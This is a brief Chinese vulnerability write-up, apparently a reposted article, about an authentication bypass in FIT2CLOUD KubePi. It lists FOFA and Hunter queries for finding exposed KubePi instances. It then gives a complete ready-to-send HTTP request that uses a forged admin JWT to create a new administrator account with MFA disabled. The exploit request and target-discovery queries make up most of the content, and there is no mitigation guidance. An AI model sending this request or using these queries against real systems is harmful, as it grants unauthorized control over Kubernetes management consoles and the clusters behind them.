0x01 免责声明
请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02 影响版本
飞致云KubePi
0x03 网络测绘
fofa:
app="FIT2CLOUD-KubePi"hunter:
app.name="KubePi"0x04 漏洞复现
用户添加成功
用户已存在提示
POST /kubepi/api/v1/users HTTP/1.1Host:Accept: application/jsonAccept-Encoding: gzip, deflateAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8Connection: close{"authenticate": {"password": "test"},"email": "[email protected]","isAdmin": true,"mfa": {"enable": false},"name": "test","nickName": "test","roles": ["Supper User"]}
文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NDUzMjU0NA==&mid=2247484269&idx=2&sn=bccc7dd0c7f926fc714f1df2f07d73ee&chksm=c3227e42f455f754c11ba00cfcca5637ef1e5f1b6c20bae09bb0f07deb518a856459f19c9bb9&mpshare=1&scene=1&srcid=0908NnWFNiqD0HmWnmVGso3l&sharer_shareinfo=fea50d73899b308f128abb68c246c10b&sharer_shareinfo_first=aca3398f1f5a4eec24fbfd1edca1add7#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh